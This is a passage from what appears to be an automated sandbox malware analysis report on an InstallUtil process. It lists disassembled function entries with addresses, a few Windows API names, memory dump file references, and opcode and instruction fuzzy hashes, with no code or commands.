                                            • Opcode Fuzzy Hash: 8486bbd52dec6cbfa436b7e27fdaaa082a0092aa3299fa740fc8e8ecde349cab
                                            • Instruction Fuzzy Hash: B041C1B1D003099FDB14CF99C984ADEFBB5FF88350F64852AE919AB210D7719945CF90
                                            Function 05CDE46C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                            Download Yara Rule
                                            APIs
                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 05CDFCF1
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1904015853.0000000005CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CD0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_5cd0000_InstallUtil.jbxd
                                            Similarity
                                            • API ID: CallProcWindow
                                            • String ID:
                                            • API String ID: 2714655100-0
                                            • Opcode ID: 0565ce6352e0f37c86cac32fb1ad9e90824b430a9970332ca1ea63b7f28cd68b
                                            • Instruction ID: 57b7a9cc14d045eed5008eb4eb14f6009f8d067547b5a49273820b56df480869
                                            • Opcode Fuzzy Hash: 0565ce6352e0f37c86cac32fb1ad9e90824b430a9970332ca1ea63b7f28cd68b
                                            • Instruction Fuzzy Hash: 8F4129B59003098FDB14CF99C488AAAFBF5FB88314F24C85DD91AA7361D774A941CBA0
                                            Function 05B9DDD0 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                            Download Yara Rule
                                            APIs
                                            • GlobalMemoryStatusEx.KERNELBASE ref: 05B9DE37
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1903736726.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_5b90000_InstallUtil.jbxd
                                            Similarity
                                            • API ID: GlobalMemoryStatus
                                            • String ID:
                                            • API String ID: 1890195054-0
                                            • Opcode ID: ad9bf711aa4d100e907dee5eedcad764c32657a106865df9a167c082854f880c
                                            • Instruction ID: 252e74adf3536ca15e83706ff2ba71ce858dcffcb2d130010cada7a6bea5050f
                                            • Opcode Fuzzy Hash: ad9bf711aa4d100e907dee5eedcad764c32657a106865df9a167c082854f880c
                                            • Instruction Fuzzy Hash: 00111FB1C006599FCB14DF9AC844ADEFBF4EB48320F11816AD818A7240D378A944CFA1
                                            Function 0239F295 Relevance: 1.4, Strings: 1, Instructions: 108COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1890464492.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2390000_InstallUtil.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PH^q
                                            • API String ID: 0-2549759414
                                            • Opcode ID: fd6b690289f35fccbd51af449794ce78ad9fb5afe12729830d7978f3bc0011ad
                                            • Instruction ID: 3cfeaa789c9d0fe43657e2dc9a2ce1809b384cd90f6b3826aba52ae0cd37c1d5
                                            • Opcode Fuzzy Hash: fd6b690289f35fccbd51af449794ce78ad9fb5afe12729830d7978f3bc0011ad
                                            • Instruction Fuzzy Hash: C531FE70B003018FDF099B74C5A476E7BE2AB8A344F248969D40ADB794EF39DC46CB91
                                            Function 0239F2A8 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1890464492.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2390000_InstallUtil.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PH^q
                                            • API String ID: 0-2549759414
                                            • Opcode ID: 98e82ca4e414bc3bee2ce9633393d91b4d263091fd01c9ad7884ce80c54f80ac
                                            • Instruction ID: 4f91780d2ffb9cbe299469c4f83215c3cfa11a34ec8eb8ea379a1711351ed477
                                            • Opcode Fuzzy Hash: 98e82ca4e414bc3bee2ce9633393d91b4d263091fd01c9ad7884ce80c54f80ac
                                            • Instruction Fuzzy Hash: E631D070B003058FDF09AB74C49466E7BE7AB8A344F248969D40ADB394EF39DC46CB91
                                            Function 02396F20 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1890464492.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2390000_InstallUtil.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LR^q
                                            • API String ID: 0-2625958711
                                            • Opcode ID: c4cf3309ee9076236c2c6c29f71ef0c357055f2cce2698db139c4d0a4ce0df69
                                            • Instruction ID: 7ae6b7bf72ab23bd84fe8a65bd1a8f30c8d7506ea495a874e6eeea8e9830fbc9
                                            • Opcode Fuzzy Hash: c4cf3309ee9076236c2c6c29f71ef0c357055f2cce2698db139c4d0a4ce0df69
                                            • Instruction Fuzzy Hash: EB317031E102098BEF24CFA5C4557AEB7B6FF86304F108529E406FB290EB71E846CB51
                                            Function 02396B49 Relevance: 1.3, Strings: 1, Instructions: 55COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1890464492.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2390000_InstallUtil.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LR^q
                                            • API String ID: 0-2625958711
                                            • Opcode ID: cdb5a9cbf695b86b70eadd27f8b8f1a4142e71b765c53b8300e5d937c5ca68d6
                                            • Instruction ID: 7694274f36734bc98bb5264f9b3cbf58d2e5937951659c6cd7ddd2300927f4ec
                                            • Opcode Fuzzy Hash: cdb5a9cbf695b86b70eadd27f8b8f1a4142e71b765c53b8300e5d937c5ca68d6
                                            • Instruction Fuzzy Hash: 081126717042505FD715AB78846429E7BF6EF86304F1084BAC21ADF395DE359C0BCB92
                                            Function 023978C0 Relevance: .6, Instructions: 554COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1890464492.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2390000_InstallUtil.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6e596ad139986df1ee4079d6bf497b52bfef7de17e471b2e64483e8952a04ae2
                                            • Instruction ID: 9823f27fa7e552a55ccbb7d5e0c72faa209a2ec7492080d3d4cfa6ad74c8df8e
                                            • Opcode Fuzzy Hash: 6e596ad139986df1ee4079d6bf497b52bfef7de17e471b2e64483e8952a04ae2
                                            • Instruction Fuzzy Hash: B11284717102118BDB25A768E454A28B7A3EBCA346F104D3ED005DB7A8CF75DC8ADB91
                                            Function 02394A34 Relevance: .3, Instructions: 260COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1890464492.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2390000_InstallUtil.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6d18e0e43cd5a4af4e7d3f9cbeaf9dc18228b3cf39403e8e72ddaa427fd92828
                                            • Instruction ID: fe3708ec16531b6b5233807a50cfd45746168b2903c7ac83276c00c8c3944af7
                                            • Opcode Fuzzy Hash: 6d18e0e43cd5a4af4e7d3f9cbeaf9dc18228b3cf39403e8e72ddaa427fd92828
                                            • Instruction Fuzzy Hash: B7A18D74E002098FDF10CFA9D98579EBBF1AF49318F148129D959E7294EB749886CF81
                                            Function 0239931C Relevance: .2, Instructions: 240COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1890464492.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2390000_InstallUtil.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 272672d3c4ff6d195452f4cc2d874391d2ed0c8736ce55172fb2b65bc8cb3bdb
                                            • Instruction ID: 2187b32b5b9057923b2dd8475ca5e742a39680d0bd92cde7440e43337ef267fe
                                            • Opcode Fuzzy Hash: 272672d3c4ff6d195452f4cc2d874391d2ed0c8736ce55172fb2b65bc8cb3bdb
                                            • Instruction Fuzzy Hash: 5E914934A002048FDF15DBA4D584BADBBF6EF89310F248569E906EB3A5DB34EC46CB50
                                            Function 02393E1C Relevance: .2, Instructions: 236COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1890464492.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2390000_InstallUtil.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0dcd4999d519e1f3ebaa4d4b4538d157bfbd2e9bd1b9d363a4abfd15b63af974
                                            • Instruction ID: 5dd46558aa9030a61a64071e7bed983ba4ddfc341e436a0925d8fe0f64cd5d38
                                            • Opcode Fuzzy Hash: 0dcd4999d519e1f3ebaa4d4b4538d157bfbd2e9bd1b9d363a4abfd15b63af974
                                            • Instruction Fuzzy Hash: 29915AB1E003099FDF20CFA9D9857DEBBF2AF49314F148129E419A7294EB749846CF81
                                            Function 02396C84 Relevance: .1, Instructions: 136COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1890464492.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2390000_InstallUtil.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 70de1783cb82dcbc0a3cd3f1eb4d5f5d1d1ef157a49f7fbb097051025e72111a
                                            • Instruction ID: 6886d1b6e2c81357abe1716a926365e197a31ccc4f2fce21853a043d80f2fff2
                                            • Opcode Fuzzy Hash: 70de1783cb82dcbc0a3cd3f1eb4d5f5d1d1ef157a49f7fbb097051025e72111a
                                            • Instruction Fuzzy Hash: C95124B0D102188FDF18CFAAC885B9DBBF9BF49714F14801AD829AB351D774A845CF95
                                            Function 02396C90 Relevance: .1, Instructions: 132COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1890464492.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2390000_InstallUtil.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c050764c5c52f63376bee3975147236a2ce9e2899b06cee126f090ccd2a6c57b
                                            • Instruction ID: f3c1df12020e9a604025f7b747bec492885b3e02e62d1df501191bc7ccd73e1d
                                            • Opcode Fuzzy Hash: c050764c5c52f63376bee3975147236a2ce9e2899b06cee126f090ccd2a6c57b
                                            • Instruction Fuzzy Hash: AD5124B0D112188FDF18CFAAC885B9EBBF9BF49704F14811AD819AB350DB749845CF95
                                            Function 02391138 Relevance: .1, Instructions: 97COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1890464492.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2390000_InstallUtil.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bf138eed6381e1856e49b7e1153270627192d7a9519e433eff51b82950861656
                                            • Instruction ID: 155ea58fc031b49408e5bd7d83eb591c53e996677a6588b4d4bf35d494f7b5f8
                                            • Opcode Fuzzy Hash: bf138eed6381e1856e49b7e1153270627192d7a9519e433eff51b82950861656
                                            • Instruction Fuzzy Hash: 3F41ED74602251CFC706FB68F9A0D493FF5F7A1706B006D69E2046723DDA206A4FEB94
                                            Function 02392686 Relevance: .1, Instructions: 96COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1890464492.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2390000_InstallUtil.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7814475fadfa8b58cc0823601a2620534b2224b58c26b59abd64b70df56dc01d
                                            • Instruction ID: bcf0e88bdb1db285a64d56c9831573da18272a11ae82fb0a2dc24dfe892540f6
                                            • Opcode Fuzzy Hash: 7814475fadfa8b58cc0823601a2620534b2224b58c26b59abd64b70df56dc01d
                                            • Instruction Fuzzy Hash: C241E1B0D00749AFDF14DFA9C584ADEBFF5EF49314F208029E819AB250DB75A945CB90
                                            Function 0239F162 Relevance: .1, Instructions: 94COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1890464492.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2390000_InstallUtil.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f019d9d6fddd8f3bc901adf77e57fe2f64c2d74e2c98a70fc32ee97a1b520fe1
                                            • Instruction ID: e592579a1347884094af700308af0e0d8b2d77e84c645223c0ccbf6634b46557
                                            • Opcode Fuzzy Hash: f019d9d6fddd8f3bc901adf77e57fe2f64c2d74e2c98a70fc32ee97a1b520fe1
                                            • Instruction Fuzzy Hash: 9A319E38E106059BDF15DFA5C8546AEB7B2FF8A304F10C929E816E7740DB70AC46CB80
                                            Function 0239182A Relevance: .1, Instructions: 94COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1890464492.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2390000_InstallUtil.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3116ebfa89caed77b3b5863b9c219f5a0413ce28acff223ed3ea3d15a07c449b
                                            • Instruction ID: 9e6802303806cf057e40f9acec9dc03faa0e6f07c357ba2bc8f62ac5da12db6c
                                            • Opcode Fuzzy Hash: 3116ebfa89caed77b3b5863b9c219f5a0413ce28acff223ed3ea3d15a07c449b
                                            • Instruction Fuzzy Hash: E231B031B002168FEF64EB64D954A9E77F2EB4A344F104469D44AFB3A0DB32DD02EB91
                                            Function 02391330 Relevance: .1, Instructions: 93COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1890464492.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2390000_InstallUtil.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1ad5027ee66b0f6df8582746eae67dd83af136652ab707a1e51ec915e0ee16dc
                                            • Instruction ID: c23964b17fb9d8d50809d9f5eeb571d873ac6d8f898077969140cf63f20884df
                                            • Opcode Fuzzy Hash: 1ad5027ee66b0f6df8582746eae67dd83af136652ab707a1e51ec915e0ee16dc
                                            • Instruction Fuzzy Hash: A33108746012524FDF22B728E494B583BB5F747306F004C6AF14EE7299DB24DD8ADB51
                                            Function 0239F168 Relevance: .1, Instructions: 91COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1890464492.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2390000_InstallUtil.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c9c859eda25cd4d444889b4c81bbd17af91a4bfca8a34e1e3a501d2ee462d384
                                            • Instruction ID: 8fd8db31099c9fd6103cbff70ac60b46edef78d72e837afd162f73d582a66c98
                                            • Opcode Fuzzy Hash: c9c859eda25cd4d444889b4c81bbd17af91a4bfca8a34e1e3a501d2ee462d384
                                            • Instruction Fuzzy Hash: 0731A034E106059BDF15CFA5C4546AEB7B2FF8A300F10C929E816E7740DB70AC46CB80
                                            Function 02392690 Relevance: .1, Instructions: 90COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1890464492.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2390000_InstallUtil.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7971066e16b4a2163348f28a64f3d53deac8cf0cef824f24c98a54c8254bac70
                                            • Instruction ID: f9baf8c092205185c2881506428733de617826d3d90f99acb54e2d8cf15d0c63
                                            • Opcode Fuzzy Hash: 7971066e16b4a2163348f28a64f3d53deac8cf0cef824f24c98a54c8254bac70
                                            • Instruction Fuzzy Hash: F741EEB0D00349AFDB14DFA9C584ADEBFF5EF49314F208029E819AB250DB75A945CB90
                                            Function 02399207 Relevance: .1, Instructions: 84COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1890464492.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2390000_InstallUtil.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 535176330e46d4d63bbcba8ac8db161cf609854bd7480ff76a9eab217b2fe41a
                                            • Instruction ID: aa6d2d3f888753ad4038248b6e731b3951c9f2cb32b2f0485727c1c0df8e8c0d
                                            • Opcode Fuzzy Hash: 535176330e46d4d63bbcba8ac8db161cf609854bd7480ff76a9eab217b2fe41a
                                            • Instruction Fuzzy Hash: 53318E71E1020A9BDF15DFA4D5947AEB7B6FF8A300F148529E805BB354EB709886CB90
                                            Function 02391770 Relevance: .1, Instructions: 84COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1890464492.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2390000_InstallUtil.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2a89839e314380ede86ba2bd511c3e0e37edbe16e0923a4839798efaca49e7cc
                                            • Instruction ID: 8ffaade6cdd343b5d93d88a88adf0eab998092867c4ddfabf39d02b35ad6d01c
                                            • Opcode Fuzzy Hash: 2a89839e314380ede86ba2bd511c3e0e37edbe16e0923a4839798efaca49e7cc
                                            • Instruction Fuzzy Hash: 76213876B002135FCF21AB38E84876E7BE2EB45641F004825E84DE3344EB35C94B8B91
                                            Function 0239143A Relevance: .1, Instructions: 83COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1890464492.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2390000_InstallUtil.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e045cd4b2a2f6425d863404c9a40d1b94c20aeb1fdcaebccd95e5af6c01b8b7c
                                            • Instruction ID: c3ee236345b2a17e68f3a4312bb69b9d840000c3fac3e63ce6af95b46d9a65ca
                                            • Opcode Fuzzy Hash: e045cd4b2a2f6425d863404c9a40d1b94c20aeb1fdcaebccd95e5af6c01b8b7c
                                            • Instruction Fuzzy Hash: 1421AF31F002568FEF35AB7884843ADBBB5EF4B215F1404BAD54AE7242D739C8818BA1
                                            Function 02391650 Relevance: .1, Instructions: 79COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1890464492.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2390000_InstallUtil.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c48f8ece52525c9fd5d97928d18feb3641aec9fd4368a90cfe022c7e883dac39
                                            • Instruction ID: 91786288ea1d264f02f1d552a1005e24bc4606a8ba5967d7515d1bc2fd1f33f5
                                            • Opcode Fuzzy Hash: c48f8ece52525c9fd5d97928d18feb3641aec9fd4368a90cfe022c7e883dac39
                                            • Instruction Fuzzy Hash: FB210B785012124FEF22B738E854B693761E757706F005D21D44DE7169EB34DC8BDB92
                                            Function 02399218 Relevance: .1, Instructions: 78COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1890464492.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2390000_InstallUtil.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 82871a3fca874b7784d6feb7beacdedae620bf0e5d9bc56d34cfb59fc583f027
                                            • Instruction ID: c6290bfd54ee01824f67dde7894e9de23a0ef4e4d04cb4cfe33ab62a3a376a30
                                            • Opcode Fuzzy Hash: 82871a3fca874b7784d6feb7beacdedae620bf0e5d9bc56d34cfb59fc583f027
                                            • Instruction Fuzzy Hash: 22217E31E1020A9BDF15DFA4D58079EB7B6BF8A300F108629E805AB254DB70D886CB90
                                            Function 022FD3EC Relevance: .1, Instructions: 75COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1888011894.00000000022FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 022FD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_22fd000_InstallUtil.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ce1c74a0aa88a650a644e8fa77266ac1b362b46b9ab4493d0725e578b5eca633
                                            • Instruction ID: f24b6f2d61a33648a04a956c7449c1bed5bcc006b9bebd6f6d2eff346eebc996
                                            • Opcode Fuzzy Hash: ce1c74a0aa88a650a644e8fa77266ac1b362b46b9ab4493d0725e578b5eca633
                                            • Instruction Fuzzy Hash: D62136B1510205DFDB09DF54D8C0B26FF65FB94320F20C678DA0A0B24AC336E416C7A1
                                            Function 02399108 Relevance: .1, Instructions: 74COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1890464492.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2390000_InstallUtil.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b34c9e581a29fcba4163d89b5183a6eacfe05de40aa9f346888b574422b027c6
                                            • Instruction ID: 78a8734960059252dc48f702444b724636eb8d9ff8eed967486b374a1b9bbac1
                                            • Opcode Fuzzy Hash: b34c9e581a29fcba4163d89b5183a6eacfe05de40aa9f346888b574422b027c6
                                            • Instruction Fuzzy Hash: B3216031E0020A9BDF19CFA4C8546DEB7B2BF8A300F14852AE815BB750EB709947CF51
                                            Function 0230D030 Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1889188235.000000000230D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0230D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_230d000_InstallUtil.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 526e7644bb654b8de5d9d7439ef3f95b4f558a9bf94ca0c754217b22cdcb454e
                                            • Instruction ID: 06ba92fa759655f81263ff16e4b3dd70ebaf9eeb32c0c18f0ab850e5e85dfc96
                                            • Opcode Fuzzy Hash: 526e7644bb654b8de5d9d7439ef3f95b4f558a9bf94ca0c754217b22cdcb454e
                                            • Instruction Fuzzy Hash: 8621D0B1604208DFDB14DF54D9D4F26BBA5EB84324F24C669E80E4A696C33AD847CA72
                                            Function 023999D8 Relevance: .1, Instructions: 71COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1890464492.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2390000_InstallUtil.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 73c07bc6bda74a66a8a48fd23d5d4634cbcc70e4bc89d1297066aff966ebd764
                                            • Instruction ID: 742d4668bccbb4e12d4514134208a94f0a5169ea96de592bf11e1f4333b7f3a4
                                            • Opcode Fuzzy Hash: 73c07bc6bda74a66a8a48fd23d5d4634cbcc70e4bc89d1297066aff966ebd764
                                            • Instruction Fuzzy Hash: 49216D71A102058FEB14DB69C954BAEBBFAFF89714F108069E505EB3A4DBB1DC408B90
                                            Function 02399118 Relevance: .1, Instructions: 70COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1890464492.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2390000_InstallUtil.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 082208a98e552362ac698944a7086b999ee8dc494b3f65b6e09e714800bdf4c9
                                            • Instruction ID: 1dafe63addbe243269607c18d4abdab7cd449152b4022f8bcf44ad54f1888826
                                            • Opcode Fuzzy Hash: 082208a98e552362ac698944a7086b999ee8dc494b3f65b6e09e714800bdf4c9
                                            • Instruction Fuzzy Hash: E3216231E0020A9BDF19CFA4C8546DEB7B6BF8A300F10852AE816FB350DB709846CF51
                                            Function 02391838 Relevance: .1, Instructions: 70COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1890464492.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2390000_InstallUtil.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c9c62e9259d11656ce7582c8904927a5367283b5207f8d11fdd8c3f66170e518
                                            • Instruction ID: 82f897fa36a4b52fc53f1664d93c43c6ce2bdc78adc6a3d3fc589b1a9b549bd8
                                            • Opcode Fuzzy Hash: c9c62e9259d11656ce7582c8904927a5367283b5207f8d11fdd8c3f66170e518
                                            • Instruction Fuzzy Hash: D2211630B042168FDF64EB68C5147AE7BF6AB8A345F100468D44AFB3A0EB369D41DB91
                                            Function 02391660 Relevance: .1, Instructions: 69COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1890464492.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2390000_InstallUtil.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 57925d1aa577fee417ab048228a6206a2eb5460af5efca8888a7e1bd470b6429
                                            • Instruction ID: 786cad1efab6edd26dd89e998717c41935d468389c047ffe873a93484106475f
                                            • Opcode Fuzzy Hash: 57925d1aa577fee417ab048228a6206a2eb5460af5efca8888a7e1bd470b6429
                                            • Instruction Fuzzy Hash: 5E21E7786112124FDF22FB38E884F1D3766E756B06F005D21E44DE7268EB34DC8A9B92
                                            Function 0230D007 Relevance: .1, Instructions: 67COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1889188235.000000000230D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0230D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_230d000_InstallUtil.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 91c22a7f31475de49374beeeac604c7437ce88fb0fcfce4d2687a44ffb309adc
                                            • Instruction ID: 778b76d9a61918b44d82b74ddf69bc380838e2d2369c14ffd3c9e315fe9a04d2
                                            • Opcode Fuzzy Hash: 91c22a7f31475de49374beeeac604c7437ce88fb0fcfce4d2687a44ffb309adc
                                            • Instruction Fuzzy Hash: 81215E755093C48FC703CB64C9A4B15BF71EB46214F29C5DBD8898F2A7C33A980ACB62
                                            Function 02390838 Relevance: .1, Instructions: 65COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1890464492.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2390000_InstallUtil.jbxd
